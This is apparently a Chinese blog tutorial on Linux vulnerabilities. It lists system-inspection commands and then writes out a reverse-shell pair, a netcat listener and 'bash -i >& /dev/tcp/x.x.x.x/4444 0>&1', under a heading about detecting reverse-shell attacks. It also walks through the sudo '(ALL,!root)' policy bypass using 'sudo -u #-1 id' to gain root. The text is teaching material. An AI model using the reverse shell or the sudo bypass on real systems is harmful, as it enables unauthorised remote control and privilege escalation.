01-Linux的漏洞

最新推荐文章于 2024-05-05 20:07:53 发布
最新推荐文章于 2024-05-05 20:07:53 发布
阅读量194 收藏
点赞数
分类专栏: 深入认识Linux 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41425613/article/details/120645257
版权

O、用于测试Linux命令

## 命令查看正在运行的进程
ps -ef   
## 查看正在监听的端口
netstat -lntp
# 包括:端口号、进程名、端口访问性、绑定IP、协议、PID、运行用户、启动时间、启动参数。

## 查看主机的启动项(ll /etc/init.d/)、计划任务(crontab -l)、安装包(rpm -qa)、环境变量(env)、内核模块(cat /proc/version)

## 检测主机反弹shell攻击并告警
# 远程连接控制的主机(退出需要在该主机上退出,类似于ssh)
nc -l -v -p 4444  
# 被远程连接控制的主机
bash -i >& /dev/tcp/x.x.x.x/4444 0>&1

一、sudo的提权漏洞

sudo 是Linux系统命令,让普通账号以root身份去执行某些命令,比如:安装软件、查看某些配置文件、关机、重启等操作、如果普通用户需要使用sudo,需要将修改配置文件/etc/sudoers,将sudo使用权赋予该账号
sudo 提权漏洞是一个安全策略绕过 

### 查看版本信息
sudo -V
### 修改配置文件
vim /etc/sudoers
在root ALL=(ALL:ALL) ALL   下面添加一行配置:test ALL=(ALL,!root) ALL

在这里插入图片描述

注意:需创建test用户:useradd test   passwd test ,修改完配置文件保存退出::wq!
  rest   表示test用户
  第一个ALL   表示用户可以在任意地方使用sudo
  第二个(ALL,!root)   表示命令可以被除了root以外的任意用户执行
  最后面的ALL   表示被允许执行
  整体: test用户可以使用sudo,但是除了root以外的任意用户去执行命令
  执行root权限命令:sudo -u #-1 id
Times my
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql-8.0.33-linux-glibc2.12-x86-64.tar.xz
05-17
centos或linux系统中使用的源码安装包,亲测有效。 MySQL 8.0.33于2023年4月18日GA,这可能是包含新功能、新特性的8.0的最后一个版本,未来的MySQL版本将会在发行方式上发生重大改变。 MySQL 企业版审计功能使用...
Linux内核漏洞有哪些
weixin_42596214的博客
02-17 446
Linux内核漏洞主要有两种:内存溢出漏洞和缓冲区溢出漏洞。内存溢出漏洞指的是程序试图向一块已经被分配出去的内存中写入数据,而缓冲区溢出漏洞指的是当程序接收到超过其所能处理的数据,就会导致缓冲区溢出,从而改变程序的运行状态。 ...
linux经典漏洞复现,[漏洞复现] CVE-2017-11882 通杀所有office版本
weixin_29065659的博客
05-16 787
1、漏洞概述这几个月来,针对微软Office套件最火热最流行的***手段,莫过于基于CVE-2017-11882的漏洞利用。2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC***代码被逐渐公开。各路大神在Twitter和Github上相继公布自己的POC及对应的漏洞利用姿势,将这股烈火蔓延到201...
几款Linux系统漏洞扫描、评估工具简介
热门推荐
晨曦蜗牛
02-02 2万+
一、Nmap Nmap 是一种常用工具,可用于判定网络的布局。我们可以在网络上使用 Nmap 来查找主机系统以及打开这些系统的端口。 1. 安装Nmap。 [root@GeekDevOps ~]# yum -y install nmap 使用示例(最简单的使用方法就是nmap 域名或ip): [root@GeekDevOps ~]# nmap 10.8.34.1 Start
Linux系统漏洞复现分析,Linux环境下常见漏洞利用技术
weixin_42357719的博客
04-29 453
记得以前在drops写过一篇文章叫 linux常见漏洞利用技术实践 ,现在还可以找得到(https://woo.49.gs/static/drops/binary-6521.html),不过当时开始学pwn不久,很多理解有偏差.现在时间过去了一年多,还经常有朋友发私信问我其中的实例程序还在不在,很遗憾我自己也没有了哈:)前不久要给别人做个这方面的培训,于是写了这个ppt,其中有我自己一些粗浅的理解...
Linux系统10个开源漏洞检测工具
大坏蛋的博客
11-29 1万+
Linux系统10个开源漏洞检测工具 1、Java自动化SQL注入测试工具 jSQL jSQL是一款轻量级安全测试工具,可以检测SQL注入漏洞。它跨平台(Windows, Linux, Mac OS X, Solaris)、开源且免费。 2、漏洞评估系统 OpenVAS OpenVAS是开放式漏洞评估系统,也可以说它是一个包含着相关工具的网络扫描器。其核心部件是一个服务器,包括一套网络...
Metasploitable2-Linux.7z
02-26
Metasploitable2-Linux.7z
cve-2021-4034漏洞检测脚本
02-13
适用于redhat发行版linux及同内核的centos系列linux
LinEnum--(linux-自动化漏洞检测)
02-03
linux-自动化漏洞检测
Metasploitable2-Linux.zip_believable
01-08
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。此文件是虚拟机镜像文件,可以直接在虚拟系统兼容的VMware,VirtualBox,和其他虚拟平台打开使用。默认只...
Linux基本安全机制介绍和Linux系统安全漏洞介绍
Black_mb_White的博客
06-05 2826
Linux系统的基本安全机制介绍 1.1、Linux系统的用户账号1 1.2、Linux的文件系统权限1 1.3、Linux的系统日志文件1
linux-journal日志文件特别大怎么办,journal日志文件学习
你是我的天晴
04-28 271
今天发现磁盘容量不多了,就去清理磁盘,发现这个文件特别大:journal,特此来学习下。
获取Java 虚拟机进程ID(java应用进程Id的方法) Linux & windows
weixin_44131922的博客
04-30 394
这个命令会列出所有包含"java"的进程信息。从中你可以找到你的Java应用对应的进程行,第一列就是进程ID(PID)。这个命令会列出所有包含"java"的进程信息。在输出的信息中,你可以找到Java进程及其PID。替换为你的Java主类名或jar文件名的部分匹配字符串,pgrep会直接返回对应的进程ID。如果你需要在Java程序内部获取其自身的进程ID,可以使用。这段代码会打印出当前运行Java程序的进程ID。
Linux 第十八章
一怀明月的博客
05-01 1218
程序地址空间 区间的地址分布 真正理解同一个地址进行读取不同内容 地址空间 虚拟地址和物理地址 虚拟地址: 物理地址: struct mm_struct 页表
Linux】开始认识软硬链接
JLX_1的博客
04-29 3159
本文通过对文件系统的总结,讲解了Linux中的软硬链接
Linux】目录和文件相关的命令,补充:centos7系统目录结构
最新发布
yannan20190313的博客
05-05 673
Linux】目录和文件相关的命令,补充:centos7系统目录结构
Linux驱动开发——(八)Linux异步通知
wJen的博客
04-27 1246
讲述了Linux内核中的异步通知及其驱动代码。
Linux中的YUM源仓库和NFS文件共享服务
2402_83805984的博客
04-29 866
yum是一个基于RPM包(是Red-Hat Package Manager红帽软件包管理器的缩写)构建的软件更新机制,能够自动解决软件包之间的依赖关系=,解决了日常工作中的大量查找安装依赖包的时间。NFS是一种基于TCP/IP传输的网络文件系统协议,最初由sun公司开发,通过NFS协议。客户机可以向访问本地目录一样访问远程NFS服务器中的共享资源。NFS也是NAS存储设备必然支持的一种协议,但是因为没有用户认证机制,而且数据在网络上明文传输、安全性很差,所以一般只能在局域网中使用。
Linux 根据提交记录生成补丁及新旧文件对比
feibafeibafeiba的博客
04-30 367
根据两个提交记录CMD1和CMD2生成差异文件list.diff,并根据CMD1的修改文件列表复制修改前的文件到old目录,修改后的文件到new目录
cve-2016-2183漏洞linux
07-28
CVE-2016-2183是OpenSSL中的漏洞,而不是Linux本身的漏洞。这个漏洞影响了OpenSSL 1.0.2之前的版本。它允许攻击者通过中间人攻击方式绕过SSL/TLS连接的加密保护,从而窃取敏感信息。 该漏洞是由于OpenSSL在处理特定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值